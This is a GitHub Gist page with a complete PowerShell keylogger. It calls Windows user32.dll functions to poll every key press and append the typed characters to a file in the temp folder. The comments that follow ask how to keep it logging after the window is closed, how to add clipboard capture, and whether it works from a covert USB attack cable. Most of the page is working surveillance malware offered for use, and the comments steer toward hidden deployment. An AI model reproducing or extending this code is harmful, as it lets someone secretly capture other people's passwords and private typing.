-
-
Save dasgoll/7ca1c059dd3b3fbc7277 to your computer and use it in GitHub Desktop.
#requires -Version 2 | |
function Start-KeyLogger($Path="$env:temp\keylogger.txt") | |
{ | |
# Signatures for API Calls | |
$signatures = @' | |
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] | |
public static extern short GetAsyncKeyState(int virtualKeyCode); | |
[DllImport("user32.dll", CharSet=CharSet.Auto)] | |
public static extern int GetKeyboardState(byte[] keystate); | |
[DllImport("user32.dll", CharSet=CharSet.Auto)] | |
public static extern int MapVirtualKey(uint uCode, int uMapType); | |
[DllImport("user32.dll", CharSet=CharSet.Auto)] | |
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); | |
'@ | |
# load signatures and make members available | |
$API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru | |
# create output file | |
$null = New-Item -Path $Path -ItemType File -Force | |
try | |
{ | |
Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red | |
# create endless loop. When user presses CTRL+C, finally-block | |
# executes and shows the collected key presses | |
while ($true) { | |
Start-Sleep -Milliseconds 40 | |
# scan all ASCII codes above 8 | |
for ($ascii = 9; $ascii -le 254; $ascii++) { | |
# get current key state | |
$state = $API::GetAsyncKeyState($ascii) | |
# is key pressed? | |
if ($state -eq -32767) { | |
$null = [console]::CapsLock | |
# translate scan code to real code | |
$virtualKey = $API::MapVirtualKey($ascii, 3) | |
# get keyboard state for virtual keys | |
$kbstate = New-Object Byte[] 256 | |
$checkkbstate = $API::GetKeyboardState($kbstate) | |
# prepare a StringBuilder to receive input key | |
$mychar = New-Object -TypeName System.Text.StringBuilder | |
# translate virtual key | |
$success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0) | |
if ($success) | |
{ | |
# add key to logger file | |
[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) | |
} | |
} | |
} | |
} | |
} | |
finally | |
{ | |
# open logger file in Notepad | |
notepad $Path | |
} | |
} | |
# records all key presses until script is aborted by pressing CTRL+C | |
# will then open the file with collected key codes | |
Start-KeyLogger |
can anyone make this.,, instead of pressing Control + C, for just closing it [X] or killing the process[powershell.exe], it will autosave to c:\keylogger.txt
Thanks
can anyone make this.,, instead of pressing Control + C, for just closing it [X] or killing the process[powershell.exe], it will autosave to c:\keylogger.txt
Thanks
(2)
I really thought that just by replacing CTRL+C to CTRL+"another letter" would work.
But its not. It does display the correct combination letter, since i replaced all CTRL+C to CTRL+"another letter".Still it will stop only after using CTRL+C, but now i figured that CTRL+C will only work after using CTRL+"another letter". So at the end of the day that is good for me. Just adds a piece of mind that saving copying some text wont accidentaly stop logger.
Also i noticed that it logs CTRL presses as odd rectangular boxes in the log.
Any idea how to log contents from clipboard as well in the same log?
CTRL + C is ASCII Code 32767.
3 - ETX (end of text)
27 - is marked as ESC
67 - C
The CTRL key does not have its own ASCII code, however the code above works as CTRL + C.
https://www.quora.com/What-is-the-ASCII-code-for-the-CTRL-key
Does this work on a usb ninja cable
my antivirus prevented it from running:
Este script contiene elementos malintencionados y ha sido bloqueado por el software antivirus.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
Easy to use without any downloads. Highly recommended! 👍 💯